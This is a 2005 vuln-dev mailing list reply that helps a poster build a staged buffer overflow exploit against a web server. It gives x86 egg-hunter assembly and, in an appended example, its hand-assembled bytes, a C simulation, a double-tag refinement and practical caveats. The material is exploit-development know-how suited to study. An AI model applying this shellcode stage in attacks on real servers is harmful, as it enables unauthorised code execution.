Vulnerability Development: Re: Exploitation Help

Re: Exploitation Help

From: Felix Lindner <felix.lindner_at_nruns.com>
Date: Wed, 18 May 2005 10:20:39 +0200

On 17 May 2005 09:20:51 -0000
<ramatkal_at_hotmail.com> wrote:
>
> So, I am basically thinking, i overflow EIP with an address that JMP's -260
> to the beginning of the Authorization header. The Authorization header then
> contains my Stage1 shellcode that starts searching down the stack for my
> Stage2 shellcode which it will find about 2k down the stack in the GET
> request.....
>
> I hope somebody understands what the hell i am talking about....

You could easily implement a small code in the 250 byte buffer doing the
following:

        mov esi, esp                ; start scanning at the current stack pointer
Loop:
        inc esi                     ; advance one byte at a time
        cmp dword [esi], 0x12345678 ; tag that marks the start of the real payload
        je found
        jmp short Loop
found:
        add esi, 4                  ; skip past the 4-byte tag
        jmp esi                     ; execute the payload

and begin your "real" shellcode with 0x12345678 or any other pattern for that
matter.

cheers
Felix

-- 
 Felix Lindner, CISSP | Senior Security Consultant, n.runs GmbH
         fx_at_nruns.com | +49 (0)171 740 20 62
A hacker does for love what others would not do for money.
Received on May 18 2005
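The stack search Felix sketches above, modelled in C as an added example (this is not code from the post or from n.runs). It scans a constructed fake stack from a chosen "ESP" offset for the 4-byte tag and returns the address just past it, exactly as the loop does. The stage-1 byte array is my own hand-assembled encoding of Felix's loop; the stack layout, offsets and stage-2 stand-in bytes are all constructed for the demo. The example goes one step beyond the post: because the tag also sits inside the hunter's own `cmp` immediate, a scan that passes over the hunter stops there instead of on the payload, so a second variant prefixes stage 2 with the tag twice and matches only the doubled copy.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The tag, as it sits in memory on x86 (0x12345678, little-endian). */
static const uint8_t egg_le[4] = { 0x78, 0x56, 0x34, 0x12 };

/* Hand-assembled x86-32 encoding of the loop from the post. Note that the
 * tag itself appears inside the cmp immediate (bytes 5..8 of this array). */
static const uint8_t stage1[] = {
    0x89, 0xE6,                         /* mov esi, esp                */
    0x46,                               /* loop: inc esi               */
    0x81, 0x3E, 0x78, 0x56, 0x34, 0x12, /* cmp dword [esi], 0x12345678 */
    0x74, 0x02,                         /* je found                    */
    0xEB, 0xF5,                         /* jmp short loop              */
    0x83, 0xC6, 0x04,                   /* found: add esi, 4           */
    0xFF, 0xE6                          /* jmp esi                     */
};

/* Stand-in for the stage-2 payload (constructed; a real payload goes here). */
static const uint8_t stage2[] = { 0x90, 0x90, 0xCC };

/* Simulated stack (constructed). Offsets mirror the post: the hunter sits in
 * the Authorization header, stage 2 roughly 2 KiB further up in the GET. */
#define STACK_SIZE  4096
#define ESP_OFF      900   /* where "mov esi, esp" starts the scan   */
#define STAGE1_OFF  1000   /* stage-1 hunter (Authorization header)  */
#define PAYLOAD_OFF 3000   /* tag(s) followed by stage 2 (GET line)   */
#define NOT_FOUND   ((size_t)-1)

static uint8_t stack_mem[STACK_SIZE];

/* Lay out filler, the hunter, and the tagged payload on the fake stack. */
static void build_stack(int double_tag)
{
    memset(stack_mem, 0x41, sizeof stack_mem);
    memcpy(stack_mem + STAGE1_OFF, stage1, sizeof stage1);
    uint8_t *p = stack_mem + PAYLOAD_OFF;
    memcpy(p, egg_le, 4); p += 4;
    if (double_tag) { memcpy(p, egg_le, 4); p += 4; }
    memcpy(p, stage2, sizeof stage2);
}

/* Felix's loop in C: byte-wise forward scan for the tag, return the address
 * just after it. Stops at 'limit' rather than running off into unmapped memory. */
static const uint8_t *egg_hunt(const uint8_t *start, const uint8_t *limit)
{
    for (const uint8_t *p = start; p + 4 <= limit; p++)
        if (memcmp(p, egg_le, 4) == 0)
            return p + 4;
    return NULL;
}

/* Double-tag variant: only two back-to-back copies of the tag count, so the
 * single copy inside the hunter's own cmp instruction cannot match. */
static const uint8_t *egg_hunt2(const uint8_t *start, const uint8_t *limit)
{
    for (const uint8_t *p = start; p + 8 <= limit; p++)
        if (memcmp(p, egg_le, 4) == 0 && memcmp(p + 4, egg_le, 4) == 0)
            return p + 8;
    return NULL;
}

static size_t to_off(const uint8_t *p)
{
    return p ? (size_t)(p - stack_mem) : NOT_FOUND;
}

/* Single tag, scan from ESP below the hunter: lands on the hunter's own
 * immediate (offset STAGE1_OFF + 9), not on stage 2. */
size_t run_single(void)
{
    build_stack(0);
    return to_off(egg_hunt(stack_mem + ESP_OFF, stack_mem + STACK_SIZE));
}

/* Double tag: lands on stage 2 (offset PAYLOAD_OFF + 8). */
size_t run_double(void)
{
    build_stack(1);
    return to_off(egg_hunt2(stack_mem + ESP_OFF, stack_mem + STACK_SIZE));
}

/* 1 if the address run_double() returns really holds the stage-2 bytes. */
int double_lands_on_stage2(void)
{
    size_t off = run_double();
    return off != NOT_FOUND && memcmp(stack_mem + off, stage2, sizeof stage2) == 0;
}

int main(void)
{
    printf("single tag: hunter returns offset %zu (payload is at %d)\n",
           run_single(), PAYLOAD_OFF + 4);
    printf("double tag: hunter returns offset %zu, stage2 ok=%d\n",
           run_double(), double_lands_on_stage2());
    return 0;
}
```

Whether the self-match matters depends on where ESP points when stage 1 runs: if the hunter is below ESP the scan never touches it, and the single tag is fine. Two further caveats a practitioner would check: the real loop does an unaligned dword read at every byte, which is legal on x86 but will fault the moment ESI walks off the mapped stack, so the payload must be guaranteed to lie above ESP in the same mapping; and the tag bytes must survive whatever parsing the server applies to the GET line, so pick a pattern that is not altered by URL decoding or case folding.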